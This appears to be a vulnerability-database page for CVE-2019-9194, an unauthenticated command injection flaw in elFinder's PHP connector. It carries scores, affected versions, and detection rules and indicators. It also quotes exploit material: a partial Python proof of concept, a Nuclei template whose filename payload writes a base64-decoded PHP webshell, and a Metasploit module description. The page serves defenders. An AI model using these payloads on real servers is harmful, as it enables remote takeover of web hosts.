CVE-2019-9194
published 2019-02-26CVE-2019-9194: elFinder before 2.1.48 has a command injection vulnerability in the PHP connector.
PriorityP190critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
96.63%
99.9th percentile
elFinder before 2.1.48 has a command injection vulnerability in the PHP connector.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| std42 | elfinder | < 2.1.48 | 2.1.48 |
| studio-42 | elfinder | >= 0 < 2.1.48 | 2.1.48 |
Detection & IOCsextracted from sources · hover to see the quote
commandupload cmd with multipart filename containing semicolon shell metacharacters: e.g. SecSignal.jpg;echo <cmd>↗
commandGET /php/connector.minimal.php?target=<hash>°ree=180&mode=rotate&cmd=resize
- →Detect unauthenticated POST requests to /php/connector.minimal.php with multipart filenames containing semicolons or shell metacharacters, indicating command injection via the filename parameter. ↗
- →Detect GET requests to /php/connector.minimal.php with query parameters cmd=resize, mode=rotate, and degree=180 immediately following a suspicious file upload — this is the trigger step for the exiftran command injection.
- →Alert on creation of new .php files in the elFinder /php/ directory or /wp-content/plugins/wp-file-manager/lib/files path, as the exploit drops a PHP webshell there. ↗
- →Monitor for the exiftran process being spawned by the web server user with filenames containing semicolons, pipes, or base64-encoded payloads in the argument list. ↗
- →Check for requests to /php/connector.minimal.php returning HTTP 200 with a JSON body containing 'added' and 'hash' fields from unauthenticated clients — this confirms successful exploitation of the upload step.
- →The PHP connector is not enabled by default; presence of an accessible connector.minimal.php is itself an indicator of misconfiguration and exploitability. ↗
- ·The vulnerability is only exploitable if the PHP connector (connector.minimal.php) is enabled and accessible; it is not enabled by default in elFinder. ↗
- ·Exploitation requires the `exiftran` utility to be installed and available in $PATH on the target system; without it, the vulnerable code path is not reached. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
elFinder command injection vulnerability in the PHP connector
osv·2022-05-13
CVE-2019-9194 [CRITICAL] elFinder command injection vulnerability in the PHP connector
elFinder command injection vulnerability in the PHP connector
elFinder before 2.1.48 has a command injection vulnerability in the PHP connector.
GHSA
elFinder command injection vulnerability in the PHP connector
ghsa·2022-05-13
CVE-2019-9194 [CRITICAL] CWE-78 elFinder command injection vulnerability in the PHP connector
elFinder command injection vulnerability in the PHP connector
elFinder before 2.1.48 has a command injection vulnerability in the PHP connector.
VulnCheck
std42 elfinder Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2019·CVSS 9.8
CVE-2019-9194 [CRITICAL] std42 elfinder Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
std42 elfinder Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
elFinder before 2.1.48 has a command injection vulnerability in the PHP connector.
Affected: std42 elfinder
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.imperva.com/blog/crimeops-of-the-kashmirblack-botnet-part-ii/
Exploit PoC: https://vulncheck.com/xdb/2ddd39e09a2d
No detection rules found.
Exploit-DB
elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)
exploitdb·2019-03-13
CVE-2019-9194 elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)
elFinder PHP Connector 'elFinder PHP Connector exiftran Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in elFinder
versions prior to 2.1.48.
The PHP connector component allows unauthenticated users to upload
files and perform file modification operations, such as resizing and
rotation of an image. The file name of uploaded files is not validated,
allowing shell metacharacters.
When performing image operations on JPEG files, the filename is passed
to the `exiftran` utility without appropriate sanitization, causing
shell commands in the file name to be executed, resulting in remote
command injection as the web server user.
The PHP connector is not enabled by default.
The system must have `exiftran` installed and in `$PATH`.
This module ha
Exploit-DB
elFinder 2.1.47 - 'PHP connector' Command Injection
exploitdb·2019-03-04·CVSS 9.8
CVE-2019-9194 [CRITICAL] elFinder 2.1.47 - 'PHP connector' Command Injection
elFinder 2.1.47 - 'PHP connector' Command Injection
---
#!/usr/bin/python
'''
# Exploit Title: elFinder SecSignal.php;echo SecSignal.jpg'
def usage():
if len(sys.argv) != 2:
print "Usage: python exploit.py [URL]"
sys.exit(0)
def upload(url, payload):
files = {'upload[]': (payload, open('SecSignal.jpg', 'rb'))}
data = {"reqid" : "1693222c439f4", "cmd" : "upload", "target" : "l1_Lw", "mtime[]" : "1497726174"}
r = requests.post("%s/php/connector.minimal.php" % url, files=files, data=data)
j = json.loads(r.text)
return j['added'][0]['hash']
def imgRotate(url, hash):
r = requests.get("%s/php/connector.minimal.php?target=%s&width=539&height=960°ree=180&quality=100&bg=&mode=rotate&cmd=resize&reqid=169323550af10c" % (url, hash))
return r.text
def shell(url):
r = requests.get(
Nuclei
elFinder <= 2.1.47 - Command Injection
nuclei·CVSS 9.8
CVE-2019-9194 [CRITICAL] elFinder <= 2.1.47 - Command Injection
elFinder "
payload: "{{rand_string}}.jpeg;echo {{base64(php_cmd)}} | base64 -d > {{file_name}}.php;echo {{rand_string}}.jpeg"
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
POST /php/connector.minimal.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="cmd"
upload
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="target"
l1_Lw
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="upload[]"; filename="{{payload}}"
Content-Type: image/jpeg
{{hex_decode("ffd8ffe000104a46494600010101006000600000ffed003850686f746f73686f7020332e30003842494d040400000000001c1c027400101c020000020004fffe003b43524541
Metasploit
elFinder PHP Connector exiftran Command Injection
metasploit
elFinder PHP Connector exiftran Command Injection
elFinder PHP Connector exiftran Command Injection
This module exploits a command injection vulnerability in elFinder versions prior to 2.1.48. The PHP connector component allows unauthenticated users to upload files and perform file modification operations, such as resizing and rotation of an image. The file name of uploaded files is not validated, allowing shell metacharacters. When performing image operations on JPEG files, the filename is passed to the `exiftran` utility without appropriate sanitization, causing shell commands in the file name to be executed, resulting in remote command injection as the web server user. The PHP connector is not enabled by default. The system must have `exiftran` installed and in `$PATH`. This module has been tested successfully on elFinder versions 2.1
https://github.com/Studio-42/elFinder/blob/master/README.mdhttps://github.com/Studio-42/elFinder/compare/6884c4f...0740028https://github.com/Studio-42/elFinder/releases/tag/2.1.48https://www.exploit-db.com/exploits/46481/https://www.exploit-db.com/exploits/46539/https://github.com/Studio-42/elFinder/blob/master/README.mdhttps://github.com/Studio-42/elFinder/compare/6884c4f...0740028https://github.com/Studio-42/elFinder/releases/tag/2.1.48https://www.exploit-db.com/exploits/46481/https://www.exploit-db.com/exploits/46539/
2019-02-26
Published
Exploited in the wild